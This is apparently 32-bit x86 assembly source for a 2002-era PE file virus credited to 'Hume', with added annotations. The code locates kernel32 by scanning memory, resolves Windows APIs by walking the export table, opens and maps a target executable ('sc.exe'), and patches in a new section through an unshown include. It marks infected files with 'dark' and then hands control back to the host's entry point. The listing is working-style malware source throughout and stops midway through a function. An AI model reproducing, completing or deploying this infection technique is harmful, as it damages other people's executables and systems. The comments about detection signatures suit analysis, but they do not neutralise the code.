.586
.model flat, stdcall
option casemap :none ; case sensitive
include c:\hd\hd.h
include c:\hd\mac.h
;;--------------
GetApiA proto :DWORD,:DWORD
;;--------------
.CODE
VirusLen = vEnd-vBegin ; size in bytes of the relocatable body between vBegin and vEnd
vBegin:
;-----------------------------------------
include s_api.asm ;查找需要的api地址
;-----------------------------------------
desfile db "sc.exe",0 ; target file name (relative path); a fixed string and a static indicator of this sample
fsize dd ? ; value returned by GetFileSize in my_infect
hfile dd ? ; handle returned by CreateFile in my_infect
hMap dd ? ; handle returned by CreateFileMapping in my_infect
pMem dd ? ; view pointer returned by MapViewOfFile in my_infect
;-----------------------------------------
; PE values used while the target is patched; presumably written by modipe.asm (not visible here) -- confirm
pe_Header dd ?
sec_align dd ?
file_align dd ?
newEip dd ?
oldEip dd ? ; original entry point RVA; added to the module base at jmp_oep
inc_size dd ?
oldEnd dd ?
;-----------------------------------------
sMessageBoxA db "MessageBoxA",0
aMessageBoxA dd 0 ; resolved address of MessageBoxA, 0 until filled
;; temporaries...
; The strings below are constant and specific to this sample, which makes them usable
; as static detection signatures for files carrying this body.
sztit db "By Hume,2002",0
szMsg0 db "Hey,Hope U enjoy it!",0
CopyRight db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah
db " Thx for using it!",0dh,0ah
db "Contact: Humewen@21cn.com",0dh,0ah
db " humeasm.yeah.net",0dh,0ah
db "The add Code SiZe:(heX)" ; no terminator: the text runs on into val
val dd 0,0,0,0 ; 16 zero bytes directly after the message; presumably filled at runtime by dislen.asm (not visible) -- confirm
;;-----------------------------------------
__Start:
; Entry point of the body. Every reference below is ebp-relative because the code is
; executed at whatever address the host's loader places it.
call _gd
_gd:
pop ebp ; ebp = runtime address of _gd
sub ebp,offset _gd ; ebp = load delta (runtime address minus assembled address)
; The image base inside a host may differ from the assembled one, so all data is relocated through ebp.
mov dword ptr [ebp+appBase],ebp ; appBase is declared in s_api.asm (not visible here)
mov eax,[esp] ; return address of the entry point, i.e. an address inside the caller
xor edx,edx
getK32Base:
; Walk downward from the return address one byte at a time until an address is found whose
; OptionalHeader.ImageBase equals the address itself. This is the well-known loader-independent
; way of locating the calling module's base; no exception handler is installed here, so an
; unmapped page in the scanned range would fault.
dec eax ; candidate = candidate - 1
mov dx,word ptr [eax+IMAGE_DOS_HEADER.e_lfanew] ; candidate+3ch
test dx,0f000h ; DOS header + stub are not expected to exceed 4096 bytes
jnz getK32Base ; quick reject
cmp eax,dword ptr [eax+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase]
jnz getK32Base ; accept only when ImageBase equals the candidate, i.e. the module start
mov [ebp+k32Base],eax ; taken as kernel32's base
lea edi,[ebp+aGetModuleHandle] ; edi = first slot of the address table; stosd advances it
lea esi,[ebp+lpApiAddrs] ; esi = zero-terminated list of name-string offsets (s_api.asm)
lop_get:
lodsd
cmp eax,0
jz End_Get ; 0 ends the list
add eax,ebp ; relocate the name pointer
push eax
push dword ptr [ebp+k32Base]
call GetApiA ; GetApiA(k32Base, name)
stosd ; store the result in the next slot; assumes the aXxx slots are contiguous (declared in s_api.asm) -- confirm
jmp lop_get ; resolver is in s_api.asm
End_Get:
call my_infect
include dislen.asm ; not visible here; presumably the message/size display -- confirm
;-----------------------------------------
CouldNotInfect:
__where:
; Decide whether this body is running inside a host it was attached to: the marker 'dark'
; is expected at offset 8 of the running module's NT headers (FileHeader.TimeDateStamp).
; A file carrying that value in TimeDateStamp is a simple static indicator of infection.
xor eax,eax
push eax
call [ebp+aGetModuleHandle] ; GetModuleHandle(NULL) = base of the running image
mov esi,eax
add esi,[esi+3ch] ; esi = PE header of the running image
cmp dword ptr [esi+8],'dark'
je jmp_oep
jmp __xit ; no marker: exit the process
jmp_oep:
add eax,[ebp+oldEip] ; eax = image base + original entry RVA
jmp eax ; hand control to the host's original entry point
my_infect: ; opens the target, maps it with extra room, then modipe.asm patches the PE
; Register use: eax = scratch/handles, ebx = zero for NULL arguments, ecx = mapping size.
; Failures fall through the cleanup labels at the bottom so opened handles are released.
xor eax,eax
push eax ; hTemplateFile = NULL
push eax ; dwFlagsAndAttributes = 0
push OPEN_EXISTING
push eax ; lpSecurityAttributes = NULL
push eax ; dwShareMode = 0 (exclusive)
push GENERIC_READ+GENERIC_WRITE
lea eax,[ebp+desfile]
push eax
call [ebp+aCreateFile] ; open the target file
inc eax
je __Err ; INVALID_HANDLE_VALUE (-1): nothing to close
dec eax
mov [ebp+hfile],eax
push eax ; keep the handle on the stack for the CreateFileMapping call below
sub ebx,ebx
push ebx ; lpFileSizeHigh = NULL
push eax
call [ebp+aGetFileSize]
inc eax
je __sclosefile ; 0FFFFFFFFh = failure. NOTE(review): the handle pushed above is never popped on this path, so the final ret does not return to the caller
dec eax
mov [ebp+fsize],eax
xchg eax,ecx
add ecx,1000h ; mapping size = file size + 1000h (a fixed 4096 here, regardless of VirusLen)
pop eax ; eax = hfile again
xor ebx,ebx
push ebx ; lpName = NULL
push ecx ; dwMaximumSizeLow = file size + 1000h
push ebx ; dwMaximumSizeHigh = 0
push PAGE_READWRITE
push ebx ; lpAttributes = NULL
push eax ; hFile
call [ebp+aCreateFileMapping]
test eax,eax
je __sclosefile ; mapping object not created
mov [ebp+hMap],eax
xor ebx,ebx
push ebx ; dwNumberOfBytesToMap = 0 (entire mapping)
push ebx ; dwFileOffsetLow = 0
push ebx ; dwFileOffsetHigh = 0
push FILE_MAP_WRITE
push eax
call [ebp+aMapViewOfFile]
test eax,eax
je __sclosemap ; view not mapped
mov [ebp+pMem],eax
;--------------------------------------------
; the following is modifying part,add new section
;--------------------------------------------
include modipe.asm ; PE patching; the comment above says it adds a new section, its contents are not visible here
__sunview:
push [ebp+pMem]
call [ebp+aUnmapViewOfFile]
__sclosemap:
push [ebp+hMap]
call [ebp+aCloseHandle]
__sclosefile:
push [ebp+hfile]
call [ebp+aCloseHandle]
__Err:: ; '::' makes the label global, presumably so the included files can jump to it -- confirm
ret
;-----------------------------------------
__xit:
push 0
call [ebp+aExitProcess] ; ExitProcess(0): reached from __where when no 'dark' marker is present
vEnd: ; end of the relocatable body (see VirusLen)
;-----------------------------------------
END __Start
;;==============================================
;;s_api.asm
;;手动查找api部分
K32_api_retrieve proc Base:DWORD ,sApi:DWORD
; Linear search of an export-name table for the string sApi.
; Register preconditions, set by the caller (GetApiA, whose body is cut off in this listing):
;   edi = AddressOfNames (table of RVAs, relative to Base)
;   ecx = number of names left to examine (consumed by 'loop')
;   edx = AddressOfNameOrdinals
; Returns: eax = entry of AddressOfNameOrdinals for the match (an index into AddressOfFunctions),
;          0 when the table is exhausted.
; Clobbers: eax, ebx, ecx, esi, flags. edx is saved and restored.
; Note: the comparison stops at sApi's terminator, so an export whose name merely
; begins with sApi is also accepted.
push edx ; save AddressOfNameOrdinals
xor eax,eax ; eax = index of the name being tested
Next_Api:
mov esi,sApi ; esi = start of the wanted name
xor edx,edx
dec edx ; edx = -1; incremented to the current character position before each compare
Match_Api_name:
movzx ebx,byte ptr [esi]
inc esi
cmp ebx,0
je foundit ; end of sApi reached with every character matched so far
inc edx
push eax
mov eax,[edi+eax*4] ; RVA of the current export name
add eax,Base ; RVA -> VA, Base must be added
cmp bl,byte ptr [eax+edx] ; compare one character
pop eax
je Match_Api_name ; keep comparing
inc eax ; mismatch: next name
loop Next_Api
no_exist:
pop edx ; restore edx; every name was examined
xor eax,eax ; return 0
ret
foundit:
pop edx ; edx = AddressOfNameOrdinals
; ordinal table entries are words, hence *2
movzx eax,word ptr [edx+eax*2] ; eax = index into AddressOfFunctions
ret
K32_api_retrieve endp
;-----------------------------------------
GetApiA proc Base:DWORD,sApi:DWORD
local ADDRofFun:DWORD
pushad
mov esi,Base
mov eax,esi
mov ebx,eax
mov ecx,eax
mov edx,eax
mov edi,eax ;all is Base!
add ecx,[ecx+3ch] ;现在esi=off PE_HEADER